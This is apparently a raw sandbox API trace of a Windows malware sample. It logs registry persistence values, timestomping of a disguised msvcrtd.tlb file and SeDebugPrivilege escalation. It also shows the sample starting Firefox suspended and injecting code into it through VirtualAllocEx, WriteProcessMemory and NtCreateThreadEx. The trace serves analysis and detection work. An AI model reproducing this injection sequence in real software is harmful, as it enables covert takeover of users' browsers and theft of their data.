CloseHandle (hObject=0x0) returned 0 [0100.193] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172fd04 | out: lpSystemTimeAsFileTime=0x172fd04*(dwLowDateTime=0x91d7c10, dwHighDateTime=0x1d3dfbb)) [0100.193] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172fce8 | out: phkResult=0x72f1ed90*=0x1a4, lpdwDisposition=0x172fce8*=0x2) returned 0x0 [0100.193] RegSetValueExA (in: hKey=0x1a4, lpValueName="LastValue", Reserved=0x0, dwType=0x4, lpData=0x72f1eda8*=0x5ae5e909, cbData=0x4 | out: lpData=0x72f1eda8*=0x5ae5e909) returned 0x0 [0100.193] RegCloseKey (hKey=0x1a4) returned 0x0 [0100.193] CloseHandle (hObject=0x180) returned 1 [0100.193] GetTickCount () returned 0x27aca [0100.193] GetLastError () returned 0x6 [0100.194] SetLastError (dwErrCode=0x6) [0100.194] GetLastError () returned 0x6 [0100.194] SetLastError (dwErrCode=0x6) [0100.194] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172da9c, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0100.194] GetFileType (hFile=0x180) returned 0x1 [0100.194] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dbc8 | out: lpSystemTimeAsFileTime=0x172dbc8*(dwLowDateTime=0x91d7c10, dwHighDateTime=0x1d3dfbb)) [0100.194] GetLastError () returned 0xb7 [0100.194] SetLastError (dwErrCode=0xb7) [0100.194] GetLastError () returned 0xb7 [0100.194] SetLastError (dwErrCode=0xb7) [0100.194] GetLastError () returned 0xb7 [0100.194] SetLastError (dwErrCode=0xb7) [0100.194] CloseHandle (hObject=0x180) returned 1 [0100.194] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0100.194] SetFileTime (hFile=0x180, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0100.194] CloseHandle (hObject=0x180) returned 1 [0100.195] Sleep (dwMilliseconds=0x47b760) [0110.198] GetLastError () returned 0x0 [0110.198] GetLastError () returned 0x0 [0110.198] GetLastError () returned 0x0 [0110.198] GetLastError () returned 0x0 [0110.198] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76700000 [0110.198] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0110.198] GetProcAddress (hModule=0x76700000, lpProcName="RegQueryValueExA") returned 0x767148ef [0110.198] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0110.198] wsprintfA (in: param_1=0x172bd9c, param_2="%s\\shell\\open\\command" | out: param_1="http\\shell\\open\\command") returned 23 [0110.198] RegCreateKeyExA (in: hKey=0x80000000, lpSubKey="http\\shell\\open\\command", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x172bc70, lpdwDisposition=0x172bc90 | out: phkResult=0x172bc70*=0x1a6, lpdwDisposition=0x172bc90*=0x2) returned 0x0 [0110.198] RegQueryValueExA (in: hKey=0x1a6, lpValueName=0x0, lpReserved=0x0, lpType=0x172bc94, lpData=0x172bc98, lpcbData=0x172bc68*=0x104 | out: lpType=0x172bc94*=0x1, lpData="\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\"", lpcbData=0x172bc68*=0x40) returned 0x0 [0110.198] RegCloseKey (hKey=0x1a6) returned 0x0 [0110.198] lstrlenA (lpString=".exe") returned 4 [0110.199] _snwprintf (in: _Dest=0x172c2f8, _Count=0x104, _Format="%S" | out: _Dest="c:\\program files\\mozilla firefox\\firefox.exe") returned 44 [0110.199] GetComputerNameW (in: lpBuffer=0x172bc88, nSize=0x172bc78 | out: lpBuffer="CRH2YWU7", nSize=0x172bc78) returned 1 [0110.199] _snwprintf (in: _Dest=0x172c0f0, _Count=0x104, _Format="%08x" | out: _Dest="c41b2305") returned 8 [0110.199] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="c41b2305") returned 0x1a4 [0110.199] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0110.199] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x77c70000 [0110.199] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76700000 [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="CreateRemoteThread") returned 0x7625f33b [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="WriteProcessMemory") returned 0x7620c1de [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="OpenProcess") returned 0x762159d7 [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="ReadProcessMemory") returned 0x7620c1ce [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0110.199] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0110.200] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0110.200] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualAllocEx") returned 0x7620c1b6 [0110.200] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualFreeEx") returned 0x7620c1ee [0110.200] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0110.200] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0110.200] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModules") returned 0x77c71408 [0110.200] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModulesEx") returned 0x77c715de [0110.200] GetProcAddress (hModule=0x77c70000, lpProcName="GetModuleBaseNameW") returned 0x77c7152c [0110.200] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcesses") returned 0x77c71544 [0110.200] GetProcAddress (hModule=0x76700000, lpProcName="LookupPrivilegeValueW") returned 0x767141b3 [0110.200] GetProcAddress (hModule=0x76700000, lpProcName="OpenProcessToken") returned 0x76714304 [0110.200] GetProcAddress (hModule=0x76700000, lpProcName="AdjustTokenPrivileges") returned 0x7671418e [0110.200] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x172be68 | out: lpLuid=0x172be68*(LowPart=0x14, HighPart=0)) returned 1 [0110.201] GetCurrentProcess () returned 0xffffffff [0110.201] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x172be74 | out: TokenHandle=0x172be74*=0x180) returned 1 [0110.201] AdjustTokenPrivileges (in: TokenHandle=0x180, DisableAllPrivileges=0, NewState=0x172be64*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0110.201] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0110.201] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0110.219] CreateProcessW (in: lpApplicationName="c:\\program files\\mozilla firefox\\firefox.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x172bfa0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x172bf44 | out: lpCommandLine=0x0, lpProcessInformation=0x172bf44*(hProcess=0x1a0, hThread=0x1a8, dwProcessId=0x7a4, dwThreadId=0x7e8)) returned 1 [0110.221] GetLastError () returned 0x0 [0110.221] OpenProcess (dwDesiredAccess=0x43a, bInheritHandle=0, dwProcessId=0x7a4) returned 0x1b0 [0110.221] VirtualAllocEx (hProcess=0x1b0, lpAddress=0x0, dwSize=0x380c, flAllocationType=0x1000, flProtect=0x4) returned 0x50000 [0110.222] VirtualProtectEx (in: hProcess=0x1b0, lpAddress=0x50000, dwSize=0x380c, flNewProtect=0x40, lpflOldProtect=0x172be70 | out: lpflOldProtect=0x172be70*=0x4) returned 1 [0110.222] WriteProcessMemory (in: hProcess=0x1b0, lpBaseAddress=0x50000, lpBuffer=0x172c500*, nSize=0x380c, lpNumberOfBytesWritten=0x172be6c | out: lpBuffer=0x172c500*, lpNumberOfBytesWritten=0x172be6c*=0x380c) returned 1 [0110.222] GetVersionExW (in: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0110.222] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77ec0000 [0110.222] GetProcAddress (hModule=0x77ec0000, lpProcName="NtCreateThreadEx") returned 0x77f05728 [0110.222] NtCreateThreadEx (in: ThreadHandle=0x172bcdc, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0x1b0, lpStartAddress=0x50202, lpParameter=0x53800, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x0, SizeOfStackReserve=0x0, lpBytesBuffer=0x172bca4 | out: ThreadHandle=0x172bcdc*=0x1ac, lpBytesBuffer=0x172bca4) returned 0x0 [0110.223] CloseHandle (hObject=0x1a0) returned 1 [0110.223] CloseHandle (hObject=0x1a8) returned 1 [0110.223] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c28, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.223] GetFileType (hFile=0x1a8) returned 0x1 [0110.223] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d54 | out: lpSystemTimeAsFileTime=0x1729d54*(dwLowDateTime=0xf181030, dwHighDateTime=0x1d3dfbb)) [0110.223] GetLastError () returned 0xb7 [0110.223] SetLastError (dwErrCode=0xb7) [0110.223] GetLastError () returned 0xb7 [0110.223] SetLastError (dwErrCode=0xb7) [0110.223] GetLastError () returned 0xb7 [0110.223] SetLastError (dwErrCode=0xb7) [0110.224] CloseHandle (hObject=0x1a8) returned 1 [0110.224] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.224] SetFileTime (hFile=0x1a8, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0110.224] CloseHandle (hObject=0x1a8) returned 1 [0110.224] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c10, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.224] GetFileType (hFile=0x1a8) returned 0x1 [0110.224] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d3c | out: lpSystemTimeAsFileTime=0x1729d3c*(dwLowDateTime=0xf181030, dwHighDateTime=0x1d3dfbb)) [0110.224] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.225] SetLastError (dwErrCode=0xb7) [0110.225] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.226] SetLastError (dwErrCode=0xb7) [0110.226] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.227] SetLastError (dwErrCode=0xb7) [0110.227] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] GetLastError () returned 0xb7 [0110.228] SetLastError (dwErrCode=0xb7) [0110.228] CloseHandle (hObject=0x1a8) returned 1 [0110.228] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.228] SetFileTime (hFile=0x1a8, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0110.229] CloseHandle (hObject=0x1a8) returned 1 [0110.229] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c08, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.229] GetFileType (hFile=0x1a8) returned 0x1 [0110.229] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d34 | out: lpSystemTimeAsFileTime=0x1729d34*(dwLowDateTime=0xf1a7190, dwHighDateTime=0x1d3dfbb)) [0110.229] GetLastError () returned 0xb7 [0110.229] SetLastError (dwErrCode=0xb7) [0110.229] GetLastError () returned 0xb7 [0110.229] SetLastError (dwErrCode=0xb7) [0110.229] GetLastError () returned 0xb7 [0110.229] SetLastError (dwErrCode=0xb7) [0110.229] CloseHandle (hObject=0x1a8) returned 1 [0110.229] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.229] SetFileTime (hFile=0x1a8, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0110.229] CloseHandle (hObject=0x1a8) returned 1 [0110.229] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0xea60) returned 0x0 [0110.286] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c30, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.286] GetFileType (hFile=0x1a8) returned 0x1 [0110.286] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d5c | out: lpSystemTimeAsFileTime=0x1729d5c*(dwLowDateTime=0xf2195b0, dwHighDateTime=0x1d3dfbb)) [0110.287] GetLastError () returned 0xb7 [0110.287] SetLastError (dwErrCode=0xb7) [0110.287] GetLastError () returned 0xb7 [0110.287] SetLastError (dwErrCode=0xb7) [0110.287] GetLastError () returned 0xb7 [0110.287] SetLastError (dwErrCode=0xb7) [0110.287] CloseHandle (hObject=0x1a8) returned 1 [0110.287] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0110.287] SetFileTime (hFile=0x1a8, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0110.287] CloseHandle (hObject=0x1a8) returned 1 [0110.287] GetLastError () returned 0x0 [0110.287] SetLastError (dwErrCode=0x0) [0110.287] GetComputerNameW (in: lpBuffer=0x172e340, nSize=0x172e320 | out: lpBuffer="CRH2YWU7", nSize=0x172e320) returned 1 [0110.287] _snwprintf (in: _Dest=0x172f1ec, _Count=0x104, _Format="\\\\.\\pipe\\%08x" | out: _Dest="\\\\.\\pipe\\c41b2304") returned 17 [0110.287] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x1a8, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0110.287] RegQueryValueExA (in: hKey=0x1a8, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x58) returned 0x0 [0110.287] RegQueryValueExA (in: hKey=0x1a8, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x302e38, lpcbData=0x172e544*=0x58 | out: lpType=0x0, lpData=0x302e38*=0x88, lpcbData=0x172e544*=0x58) returned 0x0 [0110.287] RegCloseKey (hKey=0x1a8) returned 0x0 [0110.288] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x1a8, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0110.288] RegQueryValueExA (in: hKey=0x1a8, lpValueName="Gdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0x0, lpcbData=0x172e548*=0x4) returned 0x0 [0110.288] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x1a0, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0110.288] RegQueryValueExA (in: hKey=0x1a0, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0110.288] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e520 | out: phkResult=0x72f1ed90*=0x1b4, lpdwDisposition=0x172e520*=0x2) returned 0x0 [0110.288] RegSetValueExA (in: hKey=0x1b4, lpValueName="Gdx", Reserved=0x0, dwType=0x4, lpData=0x172e578*=0x0, cbData=0x4 | out: lpData=0x172e578*=0x0) returned 0x0 [0110.288] RegCloseKey (hKey=0x1b4) returned 0x0 [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.288] SetLastError (dwErrCode=0xcb) [0110.288] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb [0110.289] SetLastError (dwErrCode=0xcb) [0110.289] GetLastError () returned 0xcb 